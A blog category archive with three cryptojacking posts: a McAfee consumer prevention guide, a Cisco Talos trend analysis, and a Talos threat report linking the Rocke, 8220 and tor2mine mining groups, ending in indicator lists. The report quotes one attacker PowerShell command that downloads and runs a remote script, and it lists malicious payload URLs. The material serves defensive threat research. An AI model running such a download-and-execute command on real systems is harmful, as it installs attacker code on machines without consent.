Category Archives: cryptomining

Cryptojacking Up 4,000% How You Can Block the Bad Guys

Cryptojacking RisingThink about it: In the course of your everyday activities — like grocery shopping or riding public transportation — the human body comes in contact with an infinite number of germs. In much the same way, as we go about our digital routines — like shopping, browsing, or watching videos — our devices can also pick up countless, undetectable malware or javascript that can infect our devices.

Which is why it’s possible that hackers may be using malware or script to siphon power from your computer — power they desperately need to fuel their cryptocurrency mining business.

What’s Cryptocurrency?

Whoa, let’s back up. What’s cryptocurrency and why would people rip off other people’s computer power to get it? Cryptocurrencies are virtual coins that have a real monetary value attached to them. Each crypto transaction is verified and added to the public ledger (also called a blockchain). The single public ledger can’t be changed without fulfilling certain conditions. These transactions are compiled by cryptocurrency miners who compete with one another by solving the complex mathematical equations attached to the exchange. Their reward for solving the equation is bitcoin, which in the crypto world can equal thousands of dollars.

Power Surge

Cryptojacking RisingHere’s the catch: To solve these complex equations and get to crypto gold, crypto miners need a lot more hardware power than the average user possesses. So, inserting malicious code into websites, apps, and ads — and hoping you click — allows malicious crypto miners to siphon power from other people’s computers without their consent.

While mining cryptocurrency can often be a harmless hobby when malware or site code is attached to drain unsuspecting users CPU power, it’s considered cryptojacking, and it’s becoming more common.

Are you feeling a bit vulnerable? You aren’t alone. According to the most recent McAfee Labs Threats Report, cryptojacking has grown more than 4,000% in the past year.

Have you been hit?

One sign that you’ve been affected is that your computer or smartphone may slow down or have more glitches than normal. Crypto mining code runs quietly in the background while you go about your everyday work or browsing and it can go undetected for a long time.

How to prevent cryptojacking

Be proactive. Your first line of defense against a malware attack is to use a comprehensive security solution on your family computers and to keep that software updated.

Cryptojacking Blocker. This new McAfee product zeroes in on the cryptojacking threat and helps prevent websites from mining for cryptocurrency (see graphic below). Cryptojacking Blocker is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.

Cryptojacking Rising

Discuss it with your family. Cryptojacking is a wild concept to explain or discuss at the dinner table, but kids need to fully understand the digital landscape and their responsibility in it. Discuss their role in helping to keep the family safe online and the motives of the bad guys who are always lurking in the background.

Smart clicks. One way illicit crypto miners get to your PC is through malicious links sent in legitimate-looking emails. Be aware of this scam (and many others) and think before you click on any links sent via email.

Stick with the legit. If a website, an app, or pop-up looks suspicious, it could contain malware or javascript that instantly starts working (mining power) when you load a compromised web page. Stick with reputable sites and apps and be extra cautious with how you interact with pop-ups.

Install updates immediately. Be sure to keep all your system software up-to-date when alerted to do so. This will help close any security gaps that hackers can exploit.

Strong passwords. These little combinations are critical to your family’s digital safety and can’t be ignored. Create unique passwords for different accounts and be sure to change out those passwords periodically.

To stay on top of the latest consumer and security threats that could impact your family, be sure to listen to our podcast Hackable? And, like us on Facebook.

The post Cryptojacking Up 4,000% How You Can Block the Bad Guys appeared first on McAfee Blogs.

As Cryptocurrency Crash Continues, Will Mining Threat Follow?

Post authored by Nick Biasini.

Executive Summary

As 2018 draws to a close, one technology has definitively left its mark on the year: cryptocurrencies. Digital currencies started the year out strong after a meteoric rise toward the end of 2017. Since then, it's safe to say that cryptocurrencies have had a massive impact globally, especially on the threat landscape. However, 2018 is ending on a sour note for these currencies, as they have been in steady decline, ending in a sudden drop resulting in losses in excess of 75 percent of their value from the highs of late 2017 and early 2018.

Malicious cryptocurrency mining was the new payload of choice for adversaries and recurring revenue, dislodging the lump-sum payouts of threats like ransomware atop the threat landscape.

But the sudden collapse of the market, after a gradual decline, raises the question about how the threat landscape would be impacted, if at all. Despite conventional wisdom, Cisco Talos hasn't seen a notable shift away from cryptocurrency mining. We have seen pockets of movement, but they have lived explicitly in the email space where both threat distribution and botnets play a crucial role. As 2018 proceeded, adversaries have shifted payloads in the email space away from cryptocurrency mining and toward more modular threats like Emotet and remote access trojans (RATs). Talos is also releasing another blog today outlining some of the campaigns we've seen recently from some well-known actors who have a history with cryptocurrency mining.

After reviewing the real-world impact and associated data, it appears that cryptocurrency mining is not slowing down, and if anything, could be slightly increasing in frequency for certain aspects of the landscape. As we move into 2019, it's likely that the payloads of choice will continue to diverge between different aspects of the threat landscape. Regardless, enterprises need to be prepared to deal with malicious or unauthorized cryptocurrency mining activities on their respective networks, because it's not going away — at least not yet.

Introduction

It's clear, as far as the threat landscape is concerned, 2018 was the year of malicious cryptocurrency mining. Cisco Talos first covered cryptocurrency mining in early 2018, and again at multiple points throughout the year, including a whitepaper discussing the threat and associated coverage. In these attacks, malicious actors inject malware into systems and steal their computing power to "mine" cryptocurrencies. If done on a large scale, this kind of attack could cost enterprises a great deal of energy and resources. And for a personal user, it could significantly slow down their computing power and speed.

At the time, it was clear that actors had started to push quickly into primarily Monero-based cryptocurrency mining as a payload of choice. Since then, we have witnessed one of the most significant shifts in the threat landscape in years — and perhaps ever. Adversaries have gone all in on the idea of the recurring revenue model of cryptocurrency mining instead of the lump-sum gamble that ransomware provided so effectively throughout 2016 and 2017. In ransomware attacks, attackers asked for infected users to pay them a sum of money in exchange for the return of their information. But with miners, the attackers see revenue on a daily basis from their activities.

This mass migration does have its risks, however. Primary among them is the value of the currency being mined. When we first wrote about malicious cryptocurrency mining, an adversary could hope to make about $0.25 per day for a basic home computer. As of the writing of this blog, that value has cratered to a little more than $0.04 per day for that same computer. As you can imagine, this has had an impact on adversaries' bottom lines. It now takes almost six systems to create the same revenue that one generated previously. Before we get too deep into the potential impact, let's discuss the size and scope of the role that cryptocurrency mining had on the threat landscape in 2018. One of the most interesting aspects is how widely this shift was adopted across multiple different attack avenues including spam, web and active exploitation.

Spam and the mining effect

One of the best indicators for how a threat is affecting the threat landscape is spam levels. Much of the spam we see on a daily basis is being generated from botnets, and those botnets are undertaking that activity to generate revenue. This is where we have seen some shifts throughout the year of cryptocurrency mining. As you can see, below the amount of overall spam, excluding two extremely high volume campaigns early in 2018, is down.
Late in 2017 and continuing into early in 2018, spam levels were dropping.Since then, they have begun to rise, and are now approaching the levels seen through most of 2017. This is indicative of botnet functionality shifts where some of the systems that had previously been used to send spam may have been altered to instead work on cryptocurrency mining. There have been reports throughout the past year of botnets such as Necurs experimenting with cryptocurrency mining instead of spam generation. However, there are two sides to the spam landscape, and they tell two different stories. One side are those that control the botnets that send spam, the other uses spam as a mechanism to spread their malware.

Adversaries that deliver their malware via spam are a different demographic, and as such, the landscape appears slightly different. Early on in 2018,Talos saw near constant campaigns delivering malicious cryptocurrency miners directly or using a downloader. As the year progressed, and more recently as the price of cryptocurrencies began to waiver, we are seeing adversaries push into different areas, delivering different payloads.

Emotet became one of the big winners as cryptocurrency miners waned. We have seen Emotet continue to be delivered in large numbers when active. Emotet continues to be a highly effective, modular payload that contains several functions, now including ransomware. These types of modular malware frameworks that allow adversaries to deliver varied payloads are going to continue to rise in popularity, as the final payload can depend on a lot of external factors. Today, when looking at the spam landscape, you do periodically see campaigns delivering miners, but they are far less common than they were earlier in 2018.Now, you are more likely to find a RAT or modular threat like Emotet than a miner. Cryptocurrency mining has had a marked impact on the email threat landscape in 2018, but email is just one of the key indicators on the threat landscape. Next, we'll take a look at web-based attacks.

Web

Web-based attacks continue to be heavily leveraged by attackers to compromise systems around the world. In previous years, exploit kits and malvertising campaigns were used to distribute ransomware and other threats to compromised systems. Since late 2016, there has been a marked decline in global exploit kit activity. Of the campaigns that remained, malicious cryptomining payloads were being distributed commonly via downloaders, rather than some of the other malware that had been historically associated with these campaigns. Along with exploit kits and malvertising, cryptocurrency mining malware was also frequently seen being delivered through fake Flash Player updates. In these attacks, victims are prompted to update their version of Adobe Flash Player, but the malware downloads a payload used to infect systems and mine cryptocurrency for cybercriminals.

Likewise, "in-browser" mining such as CoinHive became popular with many websites using scripts embedded on web pages that cause visitors of the websites to mine cryptocurrency in their web browsers. Cryptocurrency mining became so mainstream in 2018 that some shareware applications were even prompting users to allow them to leverage their systems to mine cryptocurrency as a way to support the application's developers. Regardless of the methodology, there is too much of an opportunity for adversaries to pass up. Malicious cryptocurrency mining can involve almost no additional communications, and in the case of in-browser or shareware-supported mining, it's as simple as "some money is better than no money." As long as there is money to be made, malicious or unauthorized cryptocurrency mining will be part of daily life on the internet. We've covered web and email, now let's now turn our focus to more active measures that adversaries take with direct, active exploitation.

Active exploitation

One unique aspect of malicious cryptocurrency mining is that the amount of revenue a compromised system can generate is directly related to the hardware that the system is running. Cisco Talos observed, for at least a year, as adversaries discussed the potential for malicious cryptocurrency mining and then implement those capabilities. Talos has seen countless examples of how active exploitation can play a significant role in malicious cryptocurrency mining.

From Apache Struts to Eternal Blue, Oracle WebLogic, and other widespread remotely exploitable bugs, adversaries have been actively exploiting systems to deliver hordes of miners. In some cases, adversaries added worming functionality — meaning it can self-replicate and affect other machines — to infect large swaths of machines as fast as possible. Regardless of the methodology, servers are a vital target for malicious cryptocurrency mining because of the increased revenue potential. This has mainly remained steady despite the volatility of the value in the currency itself. The fact remains that cryptocurrency mining generates revenue, and once an actor or group of actors has taken the time and cost to retool for a new threat, it's going to take a lot to move them off of that particular payload. If there were to be a significant global shift in cryptocurrency mining, this would be the place that it would likely be most noticeable. Each area of the threat landscape has been impacted in some way by cryptocurrency mining, but the real-life impacts are where enterprises are most concerned.

For more detail on the progression of these campaigns over the past year, with a specific focus on these active exploitation campaigns, see our accompanying blog here.

Real-life impact

One of the best indicators of where we are with a threat is the real-life impact. For this blog, there are two primary areas where that data will be: from the endpoint and the network. Without question, cryptocurrency mining has been the dominant threat on the threat landscape for much, if not all, of 2018. The most common alert we received in 2018 was related to cryptocurrency mining, its delivery, or its propagation by a significant margin. What's even more interesting is it doesn't appear to be fading, at least not yet.

When we began looking at the data, the expectation was that the overall amount of cryptocurrency mining activity would be decreasing in recent months, but that wasn't the case. There has been a small decrease in the amount of cryptocurrency mining activity, but those have been pigeonholed into a couple of areas of the threat landscape. The most substantial decrease has been in the number of malicious spam emails. Earlier on in 2018, we would see campaigns running around the clock delivering cryptocurrency miners. By the end of 2018, that was not the case.Instead, it's threats like RATs and Emotet that are dominating that particular landscape.
As you can see, there has been some variance in the number of events from week to week over the past six months, but generally, the trend line has held, and the overall volume of alerts has not changed significantly since June 2018.

Let's start by looking at network-based detections.In this particular circumstance, we are looking specifically at cryptocurrency mining activity on the wire, and not the delivery or propagation of the miners. This is a clean look specifically at actual mining activity instead of the distribution. Notice that if you look at the trend line, levels have increased slightly dating back to June. So despite the fact that we do not see miners being pushed at the same level, specifically in the email space, the overall capabilities remain primarily static. This implies both long-term mining activity and the importance of active exploitation, brute forcing and web-based attacks to the threat landscape, specifically around malicious mining.
The endpoint data held steady for the most part but it does vary more widely from one day to the next. That could be the result of systems being shut down or cleaned at irregular intervals. Regardless, you do not see any significant downward movement, including the last month when the price of cryptocurrencies truly cratered.

Cryptocurrency price crash

The real driving factor behind this potential large-scale shift is the value of cryptocurrency across the board. It reached levels in late 2017 that were not thought possible a mere six months earlier. As that rise continued, extreme interest in cryptocurrencies rose along with it. Quickly, people that had invested thousands of dollars a few years prior were now knocking on the door of being millionaires. This also coincided with the rise of ransomware, since cryptocurrencies are the primary method of payment.

The benefits weren't restricted to those that adopted the new currency early on. Adversaries and businesses alike found themselves sitting on sizable chunks of digital currency. Bad actors that were accepting bitcoin early on saw its value increase by tenfold, if not more, but there were always murmurs and skepticism around the meteoric rise in value.

Over the past six months, the value of cryptocurrencies had begun to fade, and over the last month-plus, the values have plummeted. At this point, most of the currencies have lost at least 75 percent of their peak values and late investors and adversaries may be paying the price.
Late in 2017, Bitcoin set an all-time high of nearly $20,000, and since then, it's been a steady decline to a value of less than $4,000, a decline of more than 75 percent from its peak in December 2017.
Monero has followed a similar path, albeit on a smaller scale. Early in 2018, Monero prices hit an all-time high of just above $470 per coin and a steady decline has followed throughout 2018. The value has now cratered to below $55 a coin — an astonishing loss of 86 percent of its value in less than a year as of the time of writing.

Although it's been a steady decline throughout the past year, the last month has been particularly brutal. Both Bitcoin and Monero have been hemorrhaging value in the past 30 days, and the effects are stark. Bitcoin has lost an improbable 40 percent of its value in the last month, only to be topped by Monero, which lost a staggering 50 percent of its value in the past 30 days.

Despite its recent collapse, it's evident that cryptocurrency is here to stay and will remain a player on the threat landscape for quite some time. For adversaries using cryptocurrency for payments such as ransomware, it doesn't have much of an effect, they increase the amount of coin they request to account for the decreased value.

Future of mining

Now that all the data has been discussed the real question remains: What does this mean for the future of mining?

The honest answer is we don't know, but there is plenty of room to speculate. The first thing to realize is cryptocurrency mining is a large portion of the threat landscape, and it will continue to be, but the question is where. The tooling and methodology required to make the shift for a threat group doing things like active exploitation and brute forcing are going to be exceedingly different from those looking to compromise average users using threats like cryptocurrency mining, RATs and banking trojans, among others. As such, the outlook for their respective landscapes differs significantly.

Those groups that focus on active exploitation and brute forcing are all in on mining, and it will take some additional force to move them off of this payload, mainly because of the resources they've already committed. It takes time and effort to shift away from things like distributed denial-of-service and spam botnets to cryptomining. Many of these adversaries took the time and effort to shift away and focus on mining. A decrease in the value of the currency isn't going to move them off of that.

Additionally, it's a question of risk and opportunity. Conducting a campaign of malicious cryptocurrency mining is far less likely to draw the attention of a security team or law enforcement when compared to some of the noisier threats like ransomware that requires command and control, victim interaction and continued communications. Malicious mining, on the other hand, allows for somewhat stable revenue generation, despite being a potentially limited earning potential per system. Money is money, and if you are operating at scale and stealing all the resources, it's primarily profit.

Conclusion

Malicious cryptocurrency mining is a massive part of the threat landscape in 2018 and appears poised to remain a significant player in 2019 and beyond. Despite the recent catastrophic price collapse of these currencies, it is still profitable in many circumstances. That does not mean that the collapse has had no impact —we've seen that it has had an impact on the volume of spam.

The data shows that this activity has been steady for the past six months and although there is a potential for a significant shift in the next six months, at least so far, it isn't in the data. Time will be the true wildcard in how mining lives on. Given time, adversaries may find a more attractive target, but right now, there are not many options that generate reliable income, with minimal risk, and don't require remote access of compromised systems. This is probably the biggest reason why mining isn't going anywhere:It's profitable. And because it's easy, anyone looking to make money will be drawn to it.

The real question is: What's next? What are the threats that enterprises should be preparing for today? Modular, flexible malware is likely the path forward as the avenues for monetization continues to change and evolve. Adversaries that are driven by monetary gain stand to generate the most revenue if they profile the end system, much like downloaders can and do today. If you compromise a gaming system or a high-end server a threat like a miner might be ideal. However, if you compromise a high-end laptop located in the U.S., you may decide ransomware is the best avenue, or if it's part of a corporate domain, just monetizing the access might be preferred. Or when compromising an average computer in a developing country, a simple bot might be best to provide a foothold to propagate an actor's malicious intentions or attack other systems and computers with an added layer of anonymity.

Regardless, it's clear why adversaries desire this type of flexibility. As systems get faster and the ways that a compromised system can be monetized continue to grow, modular malware will rise in popularity.

Connecting the dots between recently active cryptominers

Post authored by David Liebenberg and Andrew Williams.

Executive Summary

Through Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors that have netted them hundreds of thousands of U.S. dollars combined.

This blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies.

We will cover the recent activities of these actors:
  • Rocke —A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.
  • 8220 Mining Group —Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. The group targets Drupal, Hadoop YARN and Apache Struts2.
  • Tor2Mine —A group that uses tor2web to deliver proxy communications to a hidden service for command and control (C2).
These groups have used similar TTPs, including:
  • Malicious shell scripts masquerading as JPEG files with the name "logo*.jpg" that install cron jobs and download and execute miners.
  • The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.
  • Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.
  • Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.
  • Tools such as XHide Process Faker, which can hide or change the name of Linux processes and PyInstaller, which can convert Python scripts into executables.
We were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in.

The recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the illicit cryptocurrency threat. However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. Talos published separate research today covering this trend.

Timeline of actors' campaigns

Timeline of Activity

Introduction

Illicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in delivering remote access trojans (RATs) and other malware.

Through our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing analysis of these attack's wallets and command and control (C2) servers we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining.

We also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in.

We first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs.

We began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. We also noticed a similar toolset being used by an actor we named "tor2mine," based on the fact that they additionally used tor2web services for C2 communications.

We also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits.

Rocke/Iron cybercrime group

Cisco Talos wrote about Rocke earlier this year, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure.

In the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted Jenkins and JBoss servers, continuing to rely on malicious Git repositories, as well as malicious Amazon Machine Images. They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware capabilities. Several campaigns used the XHide Process Faker tool.

We have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn.

The dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files.

While keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called whatMiner, developed by a Chinese-speaking actor. WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme for the project describes it as "collecting and integrating all different kinds of illicit mining malware."

Git repository for whatMiner

Looking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors on to the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one.

While looking through this repository, we found a folder called "sustes." There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet.

Many of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. Both samples also made requests for a file called "TermsHost.exe" from an IP 39[.]108[.]177[.]252, as well as a file called "xmr.txt" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called "TermsHost.exe" hosted on their C2 ssvs[.]space and a Monero mining config file called "xmr.txt" on the C2 sydwzl[.]cn.

When we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed that they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services.

Note that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has not been activity on Rocke’s github since November, nor have we seen related samples in our honeypots since that time.

8220 Mining Group

As we previously described, Rocke originally forked a repository called "whatMiner." We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor — 8220 Mining Group — due to the repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke.

We first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a cURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed:
We were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 mining group is likely responsible for.

These campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited Drupal content management system, Hadoop YARN, Redis, Weblogic and CouchDB. Besides leveraging malicious bash scripts, Git repositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using malicious Docker images. 8220 Mining Group was able to amass nearly $200,000 worth of Monero through their campaigns.

There were some similarities to the TTPs used by Rocke and 8220 Mining Group in these campaigns. The actors downloaded a malicious file "logo*.jpg" (very similar to Rocke's use of malicious scripts under the file name of "logo*.jpg payloads), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing.

tor2mine

Over the past few years, Talos has been monitoring accesses for tor2web services, which serve as a bridge between the internet and the Tor network, a system that allows users to enable anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden.

Recently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to.

It is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system:

C:\\Windows\\System32\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))

We identified additional malware on this IP, which belongs to Total Server Solutions LLC. They appear to include 64-bit and 32-bit variants of XMRigCC — a variant of the XMRig miner, Windows executable versions of publically available EternalBlue/EternalRomance exploit scripts,an open-source TCP port scanner, and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid writing executables to the disk.

We began to research the malware and infrastructure used in this campaign. We observed previous research on a similar campaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on an IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, "/win/checking-test.hta," that was almost identical to one we saw hosted on the tor2mine actors C2, "check.hta:"

/win/checking-test.hta from previous campaign
check.hta
This actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on the XHide Process-faker tool.

Similarly, in February 2018, Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw.

This malware was developed in Python and then changed to ELF executables using the PyInstaller tool for distribution. This is the same technique we observed in a Rocke campaign.

Conclusion

Through tracking the wallets of these groups, we estimate that they hold and have made payments totaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of Monero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate.

The value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue.

There remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that pose as ransomware. However, Rocke’s GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig.

Talos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies.

Coverage

For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: Blocking Cryptocurrency Mining Using Cisco Security Products

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

Rocke

IPs:
121[.]126[.]223[.]211
142[.]44[.]215[.]177
144[.]217[.]61[.]147
118[.]24[.]150[.]172
185[.]133[.]193[.]163

Domains:
xmr.enjoytopic[.]tk
d.paloaltonetworks[.]tk
threatpost[.]tk
3g2upl4pq6kufc4m[.]tk
scan.3g2upl4pq6kufc4m[.]tk
e3sas6tzvehwgpak[.]tk
sample.sydwzl[.]cn
blockbitcoin[.]com
scan.blockbitcoin[.]tk
dazqc4f140wtl[.]cloudfront[.]net
d3goboxon32grk2l[.]tk
enjoytopic[.]tk
realtimenews[.]tk
8282[.]space
3389[.]space
svss[.]space
enjoytopic[.]esy[.]es
lienjoy[.]esy[.]es
d3oxpv9ajpsgxt[.]cloudfront[.]net
d3lvemwrafj7a7[.]cloudfront[.]net
d1ebv77j9rbkp6[.]enjoytopic[.]com
swb[.]one
d1uga3uzpppiit[.]cloudfront[.]net
emsisoft[.]enjoytopic[.]tk
ejectrift[.]censys[.]xyz
scan[.]censys[.]xyz
api[.]leakingprivacy[.]tk
news[.]realnewstime[.]xyz
scan[.]realnewstime[.]xyz
news[.]realtimenews[.]tk
scanaan[.]tk
www[.]qicheqiche[.]com

URLs:
hxxps://github[.]com/yj12ni
hxxps://github[.]com/rocke
hxxps://github[.]com/freebtcminer/
hxxps://github[.]com/tightsoft
hxxps://raw[.]githubusercontent[.]com/ghostevilxp
hxxp://www[.]qicheqiche[.]com
hxxp://123[.]206[.]13[.]220:8899
hxxps://gitee[.]com/c-888/
hxxp://gitlab[.]com/c-18
hxxp://www[.]ssvs[.]space/root[.]bin
hxxp://a[.]ssvs[.]space/db[.]sh
hxxp://a[.]ssvs[.]space/cf[.]cf
hxxp://a[.]ssvs[.]space/pluto
hxxp://ip[.]ssvs[.]space/xm64
hxxp://ip[.]ssvs[.]space/wt[.]conf
hxxp://ip[.]ssvs[.]space/mr[.]sh
hxxp://a[.]ssvs[.]space/logo[.]jpg
hxxp://a[.]sydwzl[.]cn/root[.]bin
hxxp://a[.]sydwzl[.]cn/x86[.]bin
hxxp://a[.]sydwzl[.]cn/bar[.]sh
hxxp://a[.]sydwzl[.]cn/crondb
hxxp://a[.]sydwzl[.]cn/pools[.]txt
hxxps://pastebin[.]com/raw/5bjpjvLP
hxxps://pastebin[.]com/raw/Fj2YdETv
hxxps://pastebin[.]com/raw/eRkrSQfE
hxxps://pastebin[.]com/raw/Gw7mywhC
hxxp://thyrsi[.]com/t6/387/1539580368x-1566688371[.]jpg
hxxp://thyrsi[.]com/t6/387/1539579140x1822611263[.]jpg
hxxp://thyrsi[.]com/t6/387/1539581805x1822611359[.]jpg
hxxp://thyrsi[.]com/t6/387/1539592750x-1566688347[.]jpg
hxxp://thyrsi[.]com/t6/373/1537410750x-1566657908[.]jpg
hxxp://thyrsi[.]com/t6/373/1537410304x-1404764882[.]jpg
hxxp://thyrsi[.]com/t6/377/1538099301x-1404792622[.]jpg
hxxp://thyrsi[.]com/t6/362/1535175343x-1566657675[.]jpg
hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408

SHA-256:
55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b root.bin
00e1b4874f87d124b465b311e13565a813d93bd13d73b05e6ad9b7a08085b683 root.bin
cdaa31af1f68b0e474ae1eafbf3613eafae50b8d645fef1e64743c937eff31b5 db.sh
959230efa68e0896168478d3540f25adf427c7503d5e7761597f22484fc8a451 cf.cf
d11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 pluto/xm64
da641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 root.bin
